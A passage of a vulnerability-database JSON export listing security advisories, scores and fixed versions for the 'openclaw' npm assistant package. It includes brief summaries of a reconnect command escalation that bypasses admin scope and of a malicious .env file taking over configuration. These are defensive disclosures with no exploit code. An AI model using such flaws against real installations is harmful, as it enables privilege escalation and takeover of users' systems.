"VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-89hr-6x2p-8xjv" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1p3b-pfnn-x7ad" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89787?format=api", "vulnerability_id": "VCID-1p5p-eth5-3ufu", "summary": "OpenClaw: Host exec environment overrides miss proxy, TLS, Docker, and Git TLS controls\n## Summary\nHost exec environment overrides miss proxy, TLS, Docker, and Git TLS controls\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28: host exec env policy still missed proxy, TLS, Docker, and Git TLS variables until 4d912e0451 on 2026-03-31; maintainers already accepted it and the fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `4d912e04519b4bd53b248437c53748cdebce9a41` — 2026-03-31T21:25:36+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41330", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0286", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02913", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02906", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41330" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4d912e04519b4bd53b248437c53748cdebce9a41", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/4d912e04519b4bd53b248437c53748cdebce9a41" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9gp8-hjxr-6f34", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-9gp8-hjxr-6f34" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41330", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41330" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-via-host-exec-policy", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:39:14Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-override-via-host-exec-policy" }, { "reference_url": "https://github.com/advisories/GHSA-9gp8-hjxr-6f34", "reference_id": "GHSA-9gp8-hjxr-6f34", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9gp8-hjxr-6f34" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41330", "GHSA-9gp8-hjxr-6f34" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1p5p-eth5-3ufu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90329?format=api", "vulnerability_id": "VCID-1pbz-8rnx-dkhe", "summary": "OpenClaw: Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement\n## Impact\n\nNode Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement.\n\nA previously paired node could reconnect with a broader command set, including exec-capable commands, without forcing the operator/admin re-pairing path.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.5`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42432", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08076", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08073", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.0809", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42432" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5wj5-87vq-39xm", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:17:47Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5wj5-87vq-39xm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42432", "reference_id": "CVE-2026-42432", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42432" }, { "reference_url": "https://github.com/advisories/GHSA-5wj5-87vq-39xm", "reference_id": "GHSA-5wj5-87vq-39xm", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5wj5-87vq-39xm" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-command-escalation-via-node-pairing-reconnect-bypass", "reference_id": "openclaw-command-escalation-via-node-pairing-reconnect-bypass", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "7.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T18:17:47Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-command-escalation-via-node-pairing-reconnect-bypass" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42432", "GHSA-5wj5-87vq-39xm" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1pbz-8rnx-dkhe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89803?format=api", "vulnerability_id": "VCID-1smq-mbty-jkaj", "summary": "OpenClaw has a CWD `.env` environment variable injection which bypasses host-env policy and allows config takeover\n## Summary\n\nOpenClaw loaded the current working directory `.env` before trusted state-dir configuration, allowing untrusted workspace state to inject host environment values.\n\n## Impact\n\nA repository or workspace containing a malicious `.env` file could override runtime configuration and security-sensitive environment settings when OpenClaw started there.\n\n## Affected Component\n\n`src/infra/dotenv.ts, src/cli/dotenv.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `6a79324802` (`Filter untrusted CWD .env entries before OpenClaw startup`).", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41294", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03519", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03533", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.0352", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41294" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/6a793248024dca7685f63bcceb64a0096fd1586d", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/6a793248024dca7685f63bcceb64a0096fd1586d" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.28" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-8rh7-6779-cjqq", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "9.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.5", "scoring_system": "cvssv4", "scoring_elements": 